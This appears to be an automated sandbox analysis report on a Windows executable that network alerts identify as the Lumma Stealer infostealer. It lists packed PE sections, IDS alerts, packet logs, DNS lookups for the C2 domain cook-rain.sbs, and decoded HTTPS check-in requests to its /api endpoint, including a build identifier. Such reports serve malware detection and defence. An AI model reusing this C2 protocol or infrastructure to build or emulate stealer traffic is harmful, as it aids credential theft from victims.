                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5705c0x70.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x2b0.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x571f80x8.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            0x10000x550000x25e00e9e0a6c9a7202e3e93389643e2da4d16False0.9973442656765676data7.970159978732974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x560000x2b00x20069828a6baa9d7a0a4d1538bd65398aa8False0.80078125data6.0686814441946355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata 0x570000x10000x200b32b7c4ad821f82288405a0d11e75f2fFalse0.15625data1.1076713340399604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            0x580000x2a00000x200bc44c9f87c5d8e025b9e1e526d5ea046unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            mfsomwhk0x2f80000x1990000x198600625f54b5c0586c404e96d4f0c2aa7ddaFalse0.9946697084481175data7.952928522417956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            nugibpud0x4910000x10000x4002180bc9a1c8b8345eb058347deecfeb7False0.77734375data6.002846499477447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .taggant0x4920000x30000x220047ec8153d752be9ff7e9f10773b4393bFalse0.06135110294117647DOS executable (COM)0.7947005205936104IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_MANIFEST0x4903440x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                            Imports

                                                                            DLLImport
                                                                            kernel32.dlllstrcpy

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-21T13:10:13.209048+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.10577971.1.1.153UDP
                                                                            2024-11-21T13:10:14.843348+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.1049706188.114.97.3443TCP
                                                                            2024-11-21T13:10:14.843348+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049706188.114.97.3443TCP
                                                                            2024-11-21T13:10:15.563581+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049706188.114.97.3443TCP
                                                                            2024-11-21T13:10:15.563581+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049706188.114.97.3443TCP
                                                                            2024-11-21T13:10:16.921833+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.1049712188.114.97.3443TCP
                                                                            2024-11-21T13:10:16.921833+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049712188.114.97.3443TCP
                                                                            2024-11-21T13:10:17.633811+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049712188.114.97.3443TCP
                                                                            2024-11-21T13:10:17.633811+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049712188.114.97.3443TCP
                                                                            2024-11-21T13:10:19.305479+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.1049718188.114.97.3443TCP
                                                                            2024-11-21T13:10:19.305479+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049718188.114.97.3443TCP
                                                                            2024-11-21T13:10:20.231641+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049718188.114.97.3443TCP
                                                                            2024-11-21T13:10:21.683352+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.1049724188.114.97.3443TCP
                                                                            2024-11-21T13:10:21.683352+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049724188.114.97.3443TCP
                                                                            2024-11-21T13:10:24.050016+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.1049730188.114.97.3443TCP
                                                                            2024-11-21T13:10:24.050016+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049730188.114.97.3443TCP
                                                                            2024-11-21T13:10:26.474644+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.1049736188.114.97.3443TCP
                                                                            2024-11-21T13:10:26.474644+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049736188.114.97.3443TCP
                                                                            2024-11-21T13:10:28.989608+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.1049744188.114.97.3443TCP
                                                                            2024-11-21T13:10:28.989608+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049744188.114.97.3443TCP
                                                                            2024-11-21T13:10:33.166293+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.1049762188.114.97.3443TCP
                                                                            2024-11-21T13:10:33.166293+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049762188.114.97.3443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 21, 2024 13:10:13.569672108 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:13.569719076 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:13.570337057 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:13.571778059 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:13.571794033 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:14.843214035 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:14.843348026 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:14.847044945 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:14.847052097 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:14.847326040 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:14.893127918 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:14.893127918 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:14.893275023 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:15.563590050 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:15.563697100 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:15.563749075 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:15.565500021 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:15.565531969 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:15.565551043 CET49706443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:15.565557957 CET44349706188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:15.612967968 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:15.613018990 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:15.613095999 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:15.613389969 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:15.613400936 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:16.921705008 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:16.921833038 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.029476881 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.029510975 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.029890060 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.031646967 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.031675100 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.031739950 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.633840084 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.633887053 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.633919954 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.633932114 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.633965969 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.633996964 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.634008884 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.634016037 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.634057999 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.634064913 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.642271042 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.642328024 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.642349958 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.658835888 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.658891916 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.658926010 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.712716103 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.753443003 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.806462049 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.806504965 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.844412088 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.844520092 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.844590902 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.844770908 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.844791889 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:17.844815969 CET49712443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:17.844822884 CET44349712188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:18.041512966 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:18.041559935 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:18.041754007 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:18.042015076 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:18.042032003 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:19.305296898 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:19.305479050 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:19.306833982 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:19.306865931 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:19.307130098 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:19.308511972 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:19.309115887 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:19.309148073 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:20.231663942 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:20.231764078 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:20.231833935 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:20.234291077 CET49718443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:20.234317064 CET44349718188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:20.376238108 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:20.376275063 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:20.376411915 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:20.376791000 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:20.376801014 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:21.683201075 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:21.683351994 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:21.686631918 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:21.686645031 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:21.686901093 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:21.688446045 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:21.688580990 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:21.688632011 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:21.688702106 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:21.688709021 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:22.593688965 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:22.593781948 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:22.593858957 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:22.594058990 CET49724443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:22.594075918 CET44349724188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:22.788172007 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:22.788218975 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:22.788383007 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:22.788724899 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:22.788739920 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:24.049828053 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:24.050015926 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:24.055567026 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:24.055581093 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:24.055893898 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:24.057620049 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:24.057786942 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:24.057815075 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:24.057877064 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:24.057887077 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:24.908054113 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:24.908138990 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:24.908452034 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:24.908452034 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:25.211297035 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:25.211358070 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:25.211422920 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:25.211786032 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:25.211802959 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:25.222435951 CET49730443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:25.222461939 CET44349730188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:26.474569082 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:26.474643946 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:26.476512909 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:26.476527929 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:26.476911068 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:26.478291988 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:26.479371071 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:26.479383945 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:27.191824913 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:27.191945076 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:27.192014933 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:27.192207098 CET49736443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:27.192229986 CET44349736188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:27.730916977 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:27.730967999 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:27.731048107 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:27.731393099 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:27.731406927 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.989511967 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.989608049 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.991337061 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.991343975 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.991573095 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.993007898 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.993906975 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.993940115 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994146109 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994178057 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994357109 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994391918 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994514942 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994534016 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994688034 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994716883 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994854927 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994880915 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994894028 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994909048 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.995049953 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.995068073 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.995085001 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.995229006 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.995248079 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035334110 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:29.035537004 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035584927 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:29.035612106 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035636902 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:29.035645008 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035655022 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:29.035687923 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035702944 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.627166033 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.627266884 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.627368927 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.627620935 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.627639055 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.688389063 CET49762443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.688430071 CET44349762188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.688504934 CET49762443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.688836098 CET49762443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.688846111 CET44349762188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:33.166292906 CET49762443192.168.2.10188.114.97.3

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 21, 2024 13:10:13.209048033 CET5779753192.168.2.101.1.1.1
                                                                            Nov 21, 2024 13:10:13.437159061 CET53577971.1.1.1192.168.2.10

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 21, 2024 13:10:13.209048033 CET192.168.2.101.1.1.10x786eStandard query (0)cook-rain.sbsA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 21, 2024 13:10:09.022495985 CET1.1.1.1192.168.2.100xe9a4No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 21, 2024 13:10:09.022495985 CET1.1.1.1192.168.2.100xe9a4No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                            Nov 21, 2024 13:10:13.437159061 CET1.1.1.1192.168.2.100x786eNo error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                            Nov 21, 2024 13:10:13.437159061 CET1.1.1.1192.168.2.100x786eNo error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • cook-rain.sbs

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.1049706188.114.97.34437748C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-21 12:10:14 UTC260OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2024-11-21 12:10:15 UTC984INHTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:15 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=mkohddghon70obv1n9esosc5li; expires=Mon, 17-Mar-2025 05:56:54 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2GquFMWoidtbPtgm9vqDaJUGoVmC%2FviM7XnWcAavQB8bqMbiJMCv6HpGRNbewiLYya5yifaN5ID7tTXFs1Es%2BLro%2F5zwJMC8U%2BuXglwm0QtCciH6STeI715rpa%2BvPgd"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e6093548dd6c45c-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1759036&cwnd=252&unsent_bytes=0&cid=3f884fbd085f42dc&ts=734&x=0"
                                                                            2024-11-21 12:10:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2024-11-21 12:10:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.1049712188.114.97.34437748C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-21 12:10:17 UTC261OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 53
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:17 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                            2024-11-21 12:10:17 UTC978INHTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:17 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
